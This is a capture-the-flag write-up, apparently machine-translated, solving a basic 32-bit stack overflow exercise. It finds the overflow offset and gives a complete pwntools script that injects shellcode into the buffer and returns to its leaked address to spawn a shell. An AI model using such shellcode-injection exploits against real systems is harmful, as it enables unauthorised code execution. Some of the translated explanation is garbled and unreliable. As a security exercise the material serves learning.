PWN stack overflow basic exercise - 2

Title address ： Please have a look at pwn Stack overflow basic exercises ——1 ; Put all the exercise topics of this blog
pwn1
First checksec look down , I found that no protection was turned on , Cool, dropping
take level1 Import ida, Find out buf in ebp Only 0x88, But it can be written 0x100, There is obviously stack overflow

And found that there is no direct backdoor function , Because this problem turns off the stack, it is not executable , You can construct it yourself shellcode
Direct thinking buf Deposit in shellcode, Then execute this paragraph through overflow operation shellcode that will do
First, dynamically debug to see the overflow space

Then structure shellcode And garbage data is 136+4=140 Byte space , The return address is buf Address , Because it's on ASLR,buf The address will change , But the program directly printed it for us buf The address of , very Nice！！
To write exp.py

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

shellcode = asm(shellcraft.sh())
io = process('./level1')
text = io.recvline()[14: -2]

buf_addr = int(text, 16)

payload = shellcode + b'\x90' * (140 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()

\x90： Equivalent to null instruction , Even if you execute this command, there will be no error , Suitable for filling garbage characters